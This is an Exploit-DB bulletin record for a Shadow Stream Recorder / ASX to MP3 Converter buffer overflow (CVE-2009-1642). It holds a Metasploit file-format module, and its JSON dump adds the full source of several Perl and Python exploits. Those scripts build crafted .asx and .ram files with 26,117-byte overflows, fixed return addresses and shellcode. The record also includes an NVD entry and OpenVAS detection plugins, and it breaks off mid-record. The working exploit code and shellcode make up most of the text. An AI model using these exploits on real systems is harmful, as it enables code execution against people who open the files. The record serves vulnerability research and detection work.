ID EDB-ID:18781 Type exploitdb Reporter metasploit Modified 2012-04-25T00:00:00
Description
Shadow Stream Recorder 3.0.1.7 Buffer Overflow. CVE-2009-1642. Local exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit file-format module for the Shadow Stream Recorder 3.0.1.7 buffer
# overflow. Although the class derives from Msf::Exploit::Remote, #exploit only
# builds one string and passes it to file_create; the overflow is described as
# occurring when the application opens the resulting .asx file.
#
# NOTE(review): the bulletin that carries this module (EDB-ID:18781) tags it
# CVE-2009-1642, but 'References' below lists only BID and EDB ids. The NVD
# text for that CVE names Mini-stream ASX to MP3 Converter 3.0.0.7, so confirm
# the mapping before adding a CVE reference.
class Metasploit3 < Msf::Exploit::Remote
# Reliability rank reported to the framework.
Rank = NormalRanking
# Mixin for modules that produce a file; presumably the source of the
# file_create helper called in #exploit.
include Msf::Exploit::FILEFORMAT
# Registers the module metadata (name, references, payload constraints,
# target) and the FILENAME option.
#
# @param info [Hash] metadata merged through update_info and passed to super
def initialize(info = {})
super(update_info(info,
'Name' => 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.
Using the application to open a specially crafted asx file, a buffer
overflow may occur to allow arbitrary code execution under the context
of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AlpHaNiX <alpha[at]hacker.bz>', # Original .m3u exploit
'b0telh0 <me[at]gotgeek.com.br>' # MSF Module and .asx exploit
],
# Advisory identifiers only; no CVE entry is listed here.
'References' =>
[
[ 'BID', '34864' ],
[ 'EDB', '11957' ]
],
# 'DisablePayloadHandler' is given as the string 'true', not a boolean.
# NOTE(review): presumably set because the file is opened later on another
# host, so no handler is needed at generation time -- confirm.
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
# Payload constraints: at most 2000 bytes, and none of the bytes NUL (\x00),
# tab (\x09) or line feed (\x0a).
# NOTE(review): 'StackAdjustment' presumably moves the stack pointer away
# from the payload before it runs -- confirm against the framework docs.
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x09\x0a",
'StackAdjustment' => -3500
},
# Single target. 'Ret' is a fixed address and 'Offset' is the filler length
# used by #exploit.
# NOTE(review): a hard-coded address only holds where that DLL loads at the
# same base, so the 'Windows Universal' label presumably assumes the module
# is not rebased or covered by ASLR -- confirm.
'Targets' =>
[
[ 'Windows Universal',
{
# push esp - ret ssrfilter03.dll
'Ret' => 0x10035706,
'Offset' => 26117
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2010',
'DefaultTarget' => 0))
# FILENAME is a required option and defaults to 'msf.asx'.
register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.asx'])
], self.class)
end
# Builds the file content and writes it out through file_create.
#
# Layout, in order: the literal "http://", target['Offset'] (26117) random
# upper-case letters, the target's return address packed as a 32-bit
# little-endian value, 40 NOP bytes from make_nops, then the encoded payload.
#
# Detection note: the output is a single "http://" string of more than
# 26,000 characters with no ASX markup around it, so a length limit on URIs
# in playlist files is enough to flag or reject it.
def exploit
buffer = "http://"
buffer << rand_text_alpha_upper(target['Offset'])
# 'V' packs the address as an unsigned 32-bit little-endian integer.
buffer << [target.ret].pack('V')
buffer << make_nops(40)
buffer << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
end
{"id": "EDB-ID:18781", "hash": "adc6dbcbc8d3a8d37b75f504a28dc3aa", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Shadow Stream Recorder 3.0.1.7 - Buffer Overflow", "description": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow. CVE-2009-1642. Local exploit for windows platform", "published": "2012-04-25T00:00:00", "modified": "2012-04-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18781/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-02T10:26:30", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1642"]}, {"type": "exploitdb", "idList": ["EDB-ID:8629", "EDB-ID:11958", "EDB-ID:11957", "EDB-ID:11930", "EDB-ID:8630"]}, {"type": "openvas", "idList": ["OPENVAS:900646", "OPENVAS:1361412562310900646"]}], "modified": "2016-02-02T10:26:30"}, "vulnersScore": 9.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18781/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\r\n\t\t\t\tUsing the application to open a specially crafted asx file, a buffer\r\n\t\t\t\toverflow may occur to allow arbitrary code execution under the context\r\n\t\t\t\tof the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'AlpHaNiX <alpha[at]hacker.bz>', # Original .m3u exploit\r\n\t\t\t\t\t'b0telh0 <me[at]gotgeek.com.br>' # MSF Module and .asx exploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'BID', '34864' ],\r\n\t\t\t\t\t[ 'EDB', '11957' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# push esp - ret ssrfilter03.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x10035706,\r\n\t\t\t\t\t\t\t'Offset' => 26117\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Mar 29 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [true, 'The file name.', 'msf.asx'])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = 
\"http://\"\r\n\t\tbuffer << rand_text_alpha_upper(target['Offset'])\r\n\t\tbuffer << [target.ret].pack('V')\r\n\t\tbuffer << make_nops(40)\r\n\t\tbuffer << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(buffer)\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["81487"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-12T18:08:01", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote attackers to execute arbitrary code via (1) a long rtsp URL in a .ram file and (2) a long string in the HREF attribute of a REF element in a .asx file. NOTE: the latter was also subsequently reported in \"prior to 3.1.3.7.\"", "modified": "2017-10-11T21:29:00", "published": "2009-05-15T11:30:00", "id": "CVE-2009-1642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1642", "title": "CVE-2009-1642", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:47:59", "bulletinFamily": "exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit. CVE-2009-1642. Local exploit for windows platform", "modified": "2009-05-07T00:00:00", "published": "2009-05-07T00:00:00", "id": "EDB-ID:8629", "href": "https://www.exploit-db.com/exploits/8629/", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .RAM Buffer Overflow Exploit", "sourceData": "#!/usr/bin/perl\n=gnk\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n==============================================================================\n ____ _ _ _ _ ___ _ __\n / ___| | || | | \\ | | / _ \\ | |/ /\n | | _ | || |_ | \\| | | | | | | ' / \n | |_| | |__ _| | |\\ | | |_| | | . 
\\ \n \\____| |_| |_| \\_| \\___/ |_|\\_\\...From Iran\n\n==============================================================================\n\tMini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit\n==============================================================================\n\t[\u00c2\u00bb] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....\n\t[\u00c2\u00bb] Website:............[ http://mini-stream.net/ ].....................\n\t[\u00c2\u00bb] Today:..............[ 07052009 ]....................................\n\t[\u00c2\u00bb] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........\n==============================================================================\n\n\t[x] tested on \"Windows XP SP2\"... [:-)\n\t\n=cut\n\nmy $MSD = \"rtsp://\".\"G\" x 26117;\nmy $SMN = \"\\x90\" x 16;\nmy $RA = \"\\x5D\\x38\\x82\\x7C\"; # Kernel32.dll\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nmy $Shcode = \"\\x31\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x08\".\n \"\\x99\\x23\\x82\\x83\\xeb\\xfc\\xe2\\xf4\\xf4\\x71\\x67\\x82\\x08\\x99\\xa8\\xc7\".\n \"\\x34\\x12\\x5f\\x87\\x70\\x98\\xcc\\x09\\x47\\x81\\xa8\\xdd\\x28\\x98\\xc8\\xcb\".\n \"\\x83\\xad\\xa8\\x83\\xe6\\xa8\\xe3\\x1b\\xa4\\x1d\\xe3\\xf6\\x0f\\x58\\xe9\\x8f\".\n \"\\x09\\x5b\\xc8\\x76\\x33\\xcd\\x07\\x86\\x7d\\x7c\\xa8\\xdd\\x2c\\x98\\xc8\\xe4\".\n \"\\x83\\x95\\x68\\x09\\x57\\x85\\x22\\x69\\x83\\x85\\xa8\\x83\\xe3\\x10\\x7f\\xa6\".\n \"\\x0c\\x5a\\x12\\x42\\x6c\\x12\\x63\\xb2\\x8d\\x59\\x5b\\x8e\\x83\\xd9\\x2f\\x09\".\n \"\\x78\\x85\\x8e\\x09\\x60\\x91\\xc8\\x8b\\x83\\x19\\x93\\x82\\x08\\x99\\xa8\\xea\".\n \"\\x34\\xc6\\x12\\x74\\x68\\xcf\\xaa\\x7a\\x8b\\x59\\x58\\xd2\\x60\\x69\\xa9\\x86\".\n \"\\x57\\xf1\\xbb\\x7c\\x82\\x97\\x74\\x7d\\xef\\xfa\\x42\\xee\\x6b\\x99\\x23\\x82\";\n\n open(RAM,'>>gnk.ram');\n print RAM $MSD.$RA.$SMN.$Shcode;\n close(RAM);\n\n# milw0rm.com [2009-05-07]\n", 
"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8629/"}, {"lastseen": "2016-02-01T15:24:38", "bulletinFamily": "exploit", "description": "ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit. CVE-2009-1642. Local exploit for windows platform", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "EDB-ID:11958", "href": "https://www.exploit-db.com/exploits/11958/", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n\r\nimport time\r\n# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit\r\n# Author: Hazem Mofeed\r\n# PoC: http://www.exploit-db.com/exploits/11930\r\n# Tested On: Windows Xp Home Edition SP3\r\n# Home: http://hakxer.wordpress.com\r\n\r\nprint ' Exploited by Hazem Mofeed \\n'\r\nprint ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit \\n'\r\n\r\nprint ' building exploit ..........'\r\n\r\ntime.sleep(3)\r\n\r\nshellcode = (\"\\xeb\\x16\\x5b\\x31\\xc0\\x50\\x53\\xbb\\x0d\\x25\\x86\\x7c\\xff\\xd3\\x31\\xc0\"\r\n\"\\x50\\xbb\\x12\\xcb\\x81\\x7c\\xff\\xd3\\xe8\\xe5\\xff\\xff\\xff\\x63\\x61\\x6c\"\r\n\"\\x63\\x2e\\x65\\x78\\x65\")\r\n\r\nret = \"\\x08\\x6A\\x83\\x7C\"\r\nnull = \"\\x90\" * 10\r\nexploit = (\"http://\" + \"\\x41\" * 26117 + ret + null + shellcode )\r\ntry:\r\nfile = open(\"exploit.asx\",\"w\")\r\nfile.write(exploit)\r\nfile.close()\r\nexcept:\r\nprint ' failed '", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11958/"}, {"lastseen": "2016-02-01T15:24:28", "bulletinFamily": "exploit", "description": "Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow. CVE-2009-1642. 
Local exploit for windows platform", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "EDB-ID:11957", "href": "https://www.exploit-db.com/exploits/11957/", "type": "exploitdb", "title": "Shadow Stream Recorder 3.0.1.7 - .asx Local Buffer Overflow", "sourceData": "#!/usr/bin/python\r\n#\r\n# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow\r\n# Date: 03-29-2010\r\n# Author: b0telh0\r\n# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe\r\n# Tested on: Windows XP SP3\r\n\r\n\r\n#\r\n# windows/exec - 228 bytes\r\n# EXITFUNC=seh, CMD=calc.exe\r\n#\r\n\r\nshellcode = (\"\\xda\\xd6\\xbe\\xc4\\x14\\x6b\\x17\\x31\\xc9\\xd9\\x74\\x24\\xf4\\x58\\xb1\"\r\n\t\"\\x33\\x83\\xe8\\xfc\\x31\\x70\\x14\\x03\\x70\\xd0\\xf6\\x9e\\xeb\\x30\\x7f\"\r\n\t\"\\x60\\x14\\xc0\\xe0\\xe8\\xf1\\xf1\\x32\\x8e\\x72\\xa3\\x82\\xc4\\xd7\\x4f\"\r\n\t\"\\x68\\x88\\xc3\\xc4\\x1c\\x05\\xe3\\x6d\\xaa\\x73\\xca\\x6e\\x1a\\xbc\\x80\"\r\n\t\"\\xac\\x3c\\x40\\xdb\\xe0\\x9e\\x79\\x14\\xf5\\xdf\\xbe\\x49\\xf5\\xb2\\x17\"\r\n\t\"\\x05\\xa7\\x22\\x13\\x5b\\x7b\\x42\\xf3\\xd7\\xc3\\x3c\\x76\\x27\\xb7\\xf6\"\r\n\t\"\\x79\\x78\\x67\\x8c\\x32\\x60\\x0c\\xca\\xe2\\x91\\xc1\\x08\\xde\\xd8\\x6e\"\r\n\t\"\\xfa\\x94\\xda\\xa6\\x32\\x54\\xed\\x86\\x99\\x6b\\xc1\\x0b\\xe3\\xac\\xe6\"\r\n\t\"\\xf3\\x96\\xc6\\x14\\x8e\\xa0\\x1c\\x66\\x54\\x24\\x81\\xc0\\x1f\\x9e\\x61\"\r\n\t\"\\xf0\\xcc\\x79\\xe1\\xfe\\xb9\\x0e\\xad\\xe2\\x3c\\xc2\\xc5\\x1f\\xb5\\xe5\"\r\n\t\"\\x09\\x96\\x8d\\xc1\\x8d\\xf2\\x56\\x6b\\x97\\x5e\\x39\\x94\\xc7\\x07\\xe6\"\r\n\t\"\\x30\\x83\\xaa\\xf3\\x43\\xce\\xa0\\x02\\xc1\\x74\\x8d\\x04\\xd9\\x76\\xbe\"\r\n\t\"\\x6c\\xe8\\xfd\\x51\\xeb\\xf5\\xd7\\x15\\x0d\\x07\\xea\\x83\\x99\\xbe\\x9f\"\r\n\t\"\\xe9\\xc4\\x40\\x4a\\x2d\\xf0\\xc2\\x7f\\xce\\x07\\xda\\xf5\\xcb\\x4c\\x5c\"\r\n\t\"\\xe5\\xa1\\xdd\\x09\\x09\\x15\\xde\\x1b\\x6a\\xf8\\x4c\\xc7\\x43\\x9f\\xf4\"\r\n\t\"\\x62\\x9c\\x55\");\r\n\r\njunk = \"\\x41\" * 26112\r\neip = \"\\x53\\x93\\x37\\x7E\" # 
7E379353 USER32.dll (JMP ESP)\r\nnops = \"\\x90\" * 20\r\njunk2 = \"\\x41\" * 3636\r\n\r\ntry:\r\n file = open('b0t.asx','w');\r\n file.write(junk+eip+nops+shellcode+junk2);\r\n file.close();\r\n print \"\\n[+] b0t.asx created.\"\r\n print \"[+] Open ssrecorder.exe...\"\r\n print \"[+] and drag and drop b0t.asx.\\n\"\r\nexcept:\r\n print \"\\n[-] Error.. Can't write file to system.\\n\"\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11957/"}, {"lastseen": "2016-02-01T15:21:28", "bulletinFamily": "exploit", "description": "ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC. CVE-2009-1642. Dos exploit for windows platform", "modified": "2010-03-29T00:00:00", "published": "2010-03-29T00:00:00", "id": "EDB-ID:11930", "href": "https://www.exploit-db.com/exploits/11930/", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC", "sourceData": "#!/usr/bin/perl\r\n# ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC\r\n# Exploited By mat\r\n#\r\n#EAX 00000001\r\n#ECX 41414141\r\n#EDX 00D30000\r\n#EBX 00333ED8\r\n#ESP 000F6C90\r\n#EBP 000FBFB4\r\n#ESI 77C2FCE0 msvcrt.77C2FCE0\r\n#EDI 00006619\r\n#EIP 41414141\r\n###################################################################\r\n\r\nmy $ex=\"http://\".\"\\x41\" x 26121;\r\n###################################################################\r\nopen(MYFILE,'>>mat.asx'); # (.smi) (.smil) (.wpl) (.wax)\r\nprint MYFILE $ex;\r\nclose(MYFILE);\r\n###################################################################", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11930/"}, {"lastseen": "2016-02-01T07:48:07", "bulletinFamily": "exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit. CVE-2009-1642. 
Local exploit for windows platform", "modified": "2009-05-07T00:00:00", "published": "2009-05-07T00:00:00", "id": "EDB-ID:8630", "href": "https://www.exploit-db.com/exploits/8630/", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .ASX HREF Local BoF Exploit", "sourceData": "#!/usr/bin/perl\n=gnk\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n==============================================================================\n ____ _ _ _ _ ___ _ __\n / ___| | || | | \\ | | / _ \\ | |/ /\n | | _ | || |_ | \\| | | | | | | ' / \n | |_| | |__ _| | |\\ | | |_| | | . \\ \n \\____| |_| |_| \\_| \\___/ |_|\\_\\...From Iran\n\n==============================================================================\n\tMini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit\n==============================================================================\n\t[\u00c2\u00bb] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....\n\t[\u00c2\u00bb] Website:............[ http://mini-stream.net/ ].....................\n\t[\u00c2\u00bb] Today:..............[ 07052009 ]....................................\n\t[\u00c2\u00bb] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........\n==============================================================================\n\n\t[x] tested on Windows XP SP2...\n\t[x] if you are not able to make this shit work, just put it in the Base/Root\n\t of a Drive/Partition, like \"C:\\gnk.asx\"...\n\n=cut\n\nmy $MSD = \"G\" x 26110;\nmy $SMN = \"\\x90\" x 16;\nmy $RA = \"\\x5D\\x38\\x82\\x7C\"; # Kernel32.dll\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nmy $Shcode = 
\"\\x31\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x08\".\n \"\\x99\\x23\\x82\\x83\\xeb\\xfc\\xe2\\xf4\\xf4\\x71\\x67\\x82\\x08\\x99\\xa8\\xc7\".\n \"\\x34\\x12\\x5f\\x87\\x70\\x98\\xcc\\x09\\x47\\x81\\xa8\\xdd\\x28\\x98\\xc8\\xcb\".\n \"\\x83\\xad\\xa8\\x83\\xe6\\xa8\\xe3\\x1b\\xa4\\x1d\\xe3\\xf6\\x0f\\x58\\xe9\\x8f\".\n \"\\x09\\x5b\\xc8\\x76\\x33\\xcd\\x07\\x86\\x7d\\x7c\\xa8\\xdd\\x2c\\x98\\xc8\\xe4\".\n \"\\x83\\x95\\x68\\x09\\x57\\x85\\x22\\x69\\x83\\x85\\xa8\\x83\\xe3\\x10\\x7f\\xa6\".\n \"\\x0c\\x5a\\x12\\x42\\x6c\\x12\\x63\\xb2\\x8d\\x59\\x5b\\x8e\\x83\\xd9\\x2f\\x09\".\n \"\\x78\\x85\\x8e\\x09\\x60\\x91\\xc8\\x8b\\x83\\x19\\x93\\x82\\x08\\x99\\xa8\\xea\".\n \"\\x34\\xc6\\x12\\x74\\x68\\xcf\\xaa\\x7a\\x8b\\x59\\x58\\xd2\\x60\\x69\\xa9\\x86\".\n \"\\x57\\xf1\\xbb\\x7c\\x82\\x97\\x74\\x7d\\xef\\xfa\\x42\\xee\\x6b\\x99\\x23\\x82\";\n\nmy $ASX = \n\"<asx version=\\\"3.0\\\">\n <title>Title is not important.</title>\n <entry>\n <title>Example...</title>\n <ref href=\\\"\".$MSD.$RA.$SMN.$Shcode.\"\\\" />\n <author>G4N0K</author>\n <copyright>\u00c2\u00a92009 G4N0K</copyright>\n </entry>\n</asx>\";\n\n open(ASX,'>>gnk.asx');\n print ASX $ASX;\n close(ASX);\n\n# milw0rm.com [2009-05-07]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8630/"}], "openvas": [{"lastseen": "2017-07-19T10:55:47", "bulletinFamily": "scanner", "description": "This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-05-26T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900646", "id": "OPENVAS:900646", "title": "Mini-Stream Multiple Products Stack Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
secpod_mini_stream_mult_prdts_bof_may09.nasl 6517 2017-07-04 13:34:20Z cfischer $\n#\n# Mini-Stream Multiple Products Stack Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker craft malicious\n'asx' or 'ram' files and execute arbitrary codes to cause stack overflow in\nthe context of the affected application.\n\nImpact Level: Application\";\n\ntag_affected = \"Ripper version 3.0.1.1 (3.0.1.5) and prior\nRM-MP3 Converter version 3.0.0.7 and prior\nASXtoMP3 Converter version 3.0.0.7 and prior\";\n\ntag_insight = \"Inadequate boundary checks error of user supplied input to\nMini-stream products which causes stack overflow while processing .ram and\n.asx files with overly long URIs.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. 
Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900646);\n script_version(\"$Revision: 6517 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:34:20 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-26 15:05:11 +0200 (Tue, 26 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1642\", \"CVE-2009-1641\", \"CVE-2009-1645\");\n script_bugtraq_id(34864);\n script_name(\"Mini-Stream Multiple Products Stack Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8629\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8630\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8633\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8632\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8631\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50374\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50375\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50376\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_mini_stream_prdts_detect.nasl\");\n script_mandatory_keys(\"MiniStream/Products/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : 
\"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nrmMp3 = get_kb_item(\"MiniStream/RmToMp3/Conv/Ver\");\nif(rmMp3)\n{\n if(version_is_less_equal(version:rmMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nasxMp3 = get_kb_item(\"MiniStream/AsxToMp3/Conv/Ver\");\nif(asxMp3)\n{\n if(version_is_less_equal(version:asxMp3, test_version:\"3.0.0.7\"))\n {\n security_message(0);\n }\n}\n\nripper = get_kb_item(\"MiniStream/Ripper/Ver\");\nif(ripper)\n{\n #Ministream ripper 3.0.1.1 points to the version 3.0.1.5\n if(version_is_less_equal(version:ripper,test_version:\"3.0.1.5\"))\n {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:56", "bulletinFamily": "scanner", "description": "This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.", "modified": "2018-04-06T00:00:00", "published": "2009-05-26T00:00:00", "id": "OPENVAS:1361412562310900646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900646", "title": "Mini-Stream Multiple Products Stack Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_mini_stream_mult_prdts_bof_may09.nasl 9350 2018-04-06 07:03:33Z cfischer $\n#\n# Mini-Stream Multiple Products Stack Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, 